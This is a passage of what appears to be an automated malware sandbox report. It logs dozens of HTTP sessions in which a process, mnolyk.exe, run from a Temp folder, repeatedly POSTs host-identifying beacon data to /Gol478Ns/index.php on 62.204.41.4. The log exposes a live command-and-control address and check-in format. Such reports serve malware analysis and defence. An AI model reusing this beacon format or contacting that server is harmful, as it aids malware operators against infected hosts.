                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:36.680104017 CET | 1047 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:36 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      588 | 192.168.2.7 | 50316 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:36.846930027 CET | 1048 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:36.911777973 CET | 1048 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:36 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      589 | 192.168.2.7 | 50317 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:37.080324888 CET | 1049 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:37.146085024 CET | 1049 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:37 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      59 | 192.168.2.7 | 49784 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:11.941698074 CET | 497 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:12.006139040 CET | 498 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:11 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      590 | 192.168.2.7 | 50318 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:37.320678949 CET | 1050 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:37.383331060 CET | 1050 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:37 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      591 | 192.168.2.7 | 50319 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:37.557363987 CET | 1051 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:37.621031046 CET | 1051 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:37 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      592 | 192.168.2.7 | 50320 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:37.801532030 CET | 1052 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:37.867260933 CET  1052                IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:37 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      593         192.168.2.7  50322        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 6, 2023 18:38:38.036621094 CET  1059                OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:38.104947090 CET  1060                IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:38 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      594         192.168.2.7  50323        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 6, 2023 18:38:38.290728092 CET  1061                OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:38.358603001 CET  1061                IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:38 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      595         192.168.2.7  50324        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 6, 2023 18:38:38.548279047 CET  1062                OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:38.612684011 CET  1062                IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:38 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      596         192.168.2.7  50325        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 6, 2023 18:38:38.783317089 CET  1063                OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:38.850310087 CET  1063                IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:38 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      597         192.168.2.7  50326        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 6, 2023 18:38:39.035983086 CET  1064                OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:39.102859020 CET  1064                IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:39 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      598         192.168.2.7  50327        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 6, 2023 18:38:39.273407936 CET  1065                OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:39.339062929 CET  1065                IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:39 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      599         192.168.2.7  50328        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 6, 2023 18:38:39.535774946 CET  1066                OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:39.604188919 CET  1066                IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:39 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      6           192.168.2.7  49730        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 6, 2023 18:35:58.016248941 CET  438                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:35:58.084274054 CET  438                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:35:58 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      60          192.168.2.7  49785        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 6, 2023 18:36:12.181175947 CET  498                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:12.247046947 CET  499                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:12 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      600         192.168.2.7  50329        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 6, 2023 18:38:39.784785032 CET  1067                OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:39.848402023 CET  1067                IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:39 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      601         192.168.2.7  50330        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 6, 2023 18:38:40.019565105 CET  1068                OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:40.085058928 CET  1068                IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:40 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      602         192.168.2.7  50331        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 6, 2023 18:38:40.257821083 CET  1069                OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:40.322891951 CET  1069                IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:40 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      603         192.168.2.7  50332        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 6, 2023 18:38:40.516329050 CET  1070                OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
